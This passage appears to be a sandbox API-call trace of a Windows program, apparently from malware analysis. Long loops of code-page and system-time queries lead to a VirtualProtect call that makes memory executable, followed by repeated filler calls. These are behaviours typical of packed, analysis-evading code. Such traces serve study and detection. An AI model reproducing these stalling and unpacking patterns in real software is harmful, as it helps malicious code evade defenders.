CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0178.522] GetACP () returned 0x4e4 [0178.522] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0178.522] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0178.522] GetACP () returned 0x4e4 [0178.522] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0178.523] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0178.523] GetACP () returned 0x4e4 [0178.523] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0178.523] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0178.523] GetACP () returned 0x4e4 [0178.523] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0178.523] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0178.523] GetACP () returned 0x4e4 [0178.523] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0178.523] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0178.523] GetACP () returned 0x4e4 [0178.523] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0178.523] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0178.523] GetACP () returned 0x4e4 [0178.523] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0178.523] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0178.523] GetACP () returned 0x4e4 [0178.524] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0178.524] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0178.524] GetACP () returned 0x4e4 [0178.524] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0178.524] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0178.524] GetACP () returned 0x4e4 [0178.524] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0178.524] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0178.524] GetACP () returned 0x4e4 [0178.524] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0178.524] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0178.524] GetACP () returned 0x4e4 [0178.524] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0178.524] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0178.524] GetACP () returned 0x4e4 [0178.524] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0178.524] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0178.525] GetACP () returned 0x4e4 [0178.525] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0178.525] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0178.525] GetACP () returned 0x4e4 [0178.525] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0178.525] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0178.525] GetACP () returned 0x4e4 [0178.525] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0178.525] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0178.525] GetACP () returned 0x4e4 [0178.525] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0178.525] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0178.525] GetACP () returned 0x4e4 [0178.525] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0178.525] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0178.525] GetACP () returned 0x4e4 [0178.525] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0178.526] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0178.526] GetACP () returned 0x4e4 [0178.526] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0178.526] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0178.526] GetACP () returned 0x4e4 [0178.526] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0178.526] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0178.526] GetACP () returned 0x4e4 [0178.526] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0178.526] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0178.526] GetACP () returned 0x4e4 [0178.526] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0178.526] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0178.526] GetACP () returned 0x4e4 [0178.526] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0178.526] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0178.526] GetACP () returned 0x4e4 [0178.527] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0178.527] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0178.527] GetACP () returned 0x4e4 [0178.527] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0178.527] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0178.527] GetACP () returned 0x4e4 [0178.527] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0178.527] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0178.527] GetACP () returned 0x4e4 [0178.527] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0178.527] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0178.527] GetACP () returned 0x4e4 [0178.527] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0178.527] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0178.527] GetACP () returned 0x4e4 [0178.842] VirtualProtect (in: lpAddress=0x5d5ab8, dwSize=0xf2eb, flNewProtect=0x40, lpflOldProtect=0x43ad04 | out: lpflOldProtect=0x43ad04*=0x4) returned 1 [0178.843] AddAtomA (lpString=0x0) returned 0x0 [0178.843] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0178.843] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0178.843] AddAtomA (lpString=0x0) returned 0x0 [0178.843] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0178.843] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0178.843] AddAtomA (lpString=0x0) returned 0x0 [0178.843] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0178.843] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0178.843] AddAtomA (lpString=0x0) returned 0x0 [0178.843] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0178.843] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0178.843] AddAtomA (lpString=0x0) returned 0x0 [0178.843] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0178.844] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0178.844] AddAtomA (lpString=0x0) returned 0x0 [0178.844] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0178.844] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0178.844] AddAtomA (lpString=0x0) returned 0x0 [0178.844] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0178.844] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0178.844] AddAtomA (lpString=0x0) returned 0x0 [0178.844] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0178.844] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0178.844] AddAtomA (lpString=0x0) returned 0x0 [0178.844] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0178.844] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0178.844] AddAtomA (lpString=0x0) returned 0x0 [0178.844] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0178.844] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0178.844] AddAtomA (lpString=0x0) returned 0x0 [0178.844] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0178.844] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0178.844] AddAtomA (lpString=0x0) returned 0x0 [0178.844] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0178.844] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0178.844] AddAtomA (lpString=0x0) returned 0x0 [0178.845] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0178.845] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0178.845] AddAtomA (lpString=0x0) returned 0x0 [0178.845] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0178.845] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0178.845] AddAtomA (lpString=0x0) returned 0x0 [0178.845] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0178.845] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0178.845] AddAtomA (lpString=0x0) returned 0x0 [0178.845] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0178.845] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0178.845] AddAtomA (lpString=0x0) returned 0x0 [0178.845] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0178.845] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0178.845] AddAtomA (lpString=0x0) returned 0x0 [0178.845] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0178.845] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0178.845] AddAtomA (lpString=0x0) returned 0x0 [0178.845] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0178.845] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0178.845] AddAtomA (lpString=0x0) returned 0x0 [0178.845] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0178.845] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0178.845] AddAtomA (lpString=0x0) returned 0x0 [0178.846] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0178.846] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0178.846] AddAtomA (lpString=0x0) returned 0x0 [0178.846] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0178.846] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0178.846] AddAtomA (lpString=0x0) returned 0x0 [0178.846] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0178.846] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0178.846] AddAtomA (lpString=0x0) returned 0x0 [0178.846] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0178.846] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0178.846] AddAtomA (lpString=0x0) returned 0x0 [0178.846] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0178.846] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0178.846] AddAtomA (lpString=0x0) returned 0x0 [0178.846] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0178.846] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0178.847] AddAtomA (lpString=0x0) returned 0x0 [0178.847] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.602] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.602] AddAtomA (lpString=0x0) returned 0x0 [0179.602] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.602] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.602] AddAtomA (lpString=0x0) returned 0x0 [0179.602] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.602] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.602] AddAtomA (lpString=0x0) returned 0x0 [0179.602] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.602] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.602] AddAtomA (lpString=0x0) returned 0x0 [0179.602] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.602] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.602] AddAtomA (lpString=0x0) returned 0x0 [0179.603] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.603] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.603] AddAtomA (lpString=0x0) returned 0x0 [0179.603] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.603] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.603] AddAtomA (lpString=0x0) returned 0x0 [0179.603] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.603] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.603] AddAtomA (lpString=0x0) returned 0x0 [0179.603] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.603] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.603] AddAtomA (lpString=0x0) returned 0x0 [0179.603] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.603] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.603] AddAtomA (lpString=0x0) returned 0x0 [0179.603] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.603] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.603] AddAtomA (lpString=0x0) returned 0x0 [0179.603] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.603] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.603] AddAtomA (lpString=0x0) returned 0x0 [0179.603] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.604] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.604] AddAtomA (lpString=0x0) returned 0x0 [0179.604] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.604] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.604] AddAtomA (lpString=0x0) returned 0x0 [0179.604] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.604] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.604] AddAtomA (lpString=0x0) returned 0x0 [0179.604] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.604] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.604] AddAtomA (lpString=0x0) returned 0x0 [0179.604] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.604] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.604] AddAtomA (lpString=0x0) returned 0x0 [0179.604] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.604] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.604] AddAtomA (lpString=0x0) returned 0x0 [0179.604] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.604] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.604] AddAtomA (lpString=0x0) returned 0x0 [0179.604] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.604] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.605] AddAtomA (lpString=0x0) returned 0x0 [0179.605] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.605] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.605] AddAtomA (lpString=0x0) returned 0x0 [0179.605] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.605] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.605] AddAtomA (lpString=0x0) returned 0x0 [0179.605] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.605] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.605] AddAtomA (lpString=0x0) returned 0x0 [0179.605] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.605] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.605] AddAtomA (lpString=0x0) returned 0x0 [0179.605] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.605] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.605] AddAtomA (lpString=0x0) returned 0x0 [0179.605] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.605] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.605] AddAtomA (lpString=0x0) returned 0x0 [0179.605] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.605] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.606] AddAtomA (lpString=0x0) returned 0x0 [0179.606] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.606] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.606] AddAtomA (lpString=0x0) returned 0x0 [0179.606] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.606] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.606] AddAtomA (lpString=0x0) returned 0x0 [0179.606] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.606] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.606] AddAtomA (lpString=0x0) returned 0x0 [0179.606] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.606] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.606] AddAtomA (lpString=0x0) returned 0x0 [0179.606] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.606] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.606] AddAtomA (lpString=0x0) returned 0x0 [0179.606] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.606] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.606] AddAtomA (lpString=0x0) returned 0x0 [0179.606] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.606] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.606] AddAtomA (lpString=0x0) returned 0x0 [0179.606] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.607] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.607] AddAtomA (lpString=0x0) returned 0x0 [0179.607] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.607] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.607] AddAtomA (lpString=0x0) returned 0x0 [0179.607] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.607] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.607] AddAtomA (lpString=0x0) returned 0x0 [0179.607] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.607] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.607] AddAtomA (lpString=0x0) returned 0x0 [0179.607] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.607] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.607] AddAtomA (lpString=0x0) returned 0x0 [0179.607] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.607] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.607] AddAtomA (lpString=0x0) returned 0x0 [0179.607] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.607] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.607] AddAtomA (lpString=0x0) returned 0x0 [0179.607] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.608] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.608] AddAtomA (lpString=0x0) returned 0x0 [0179.608] 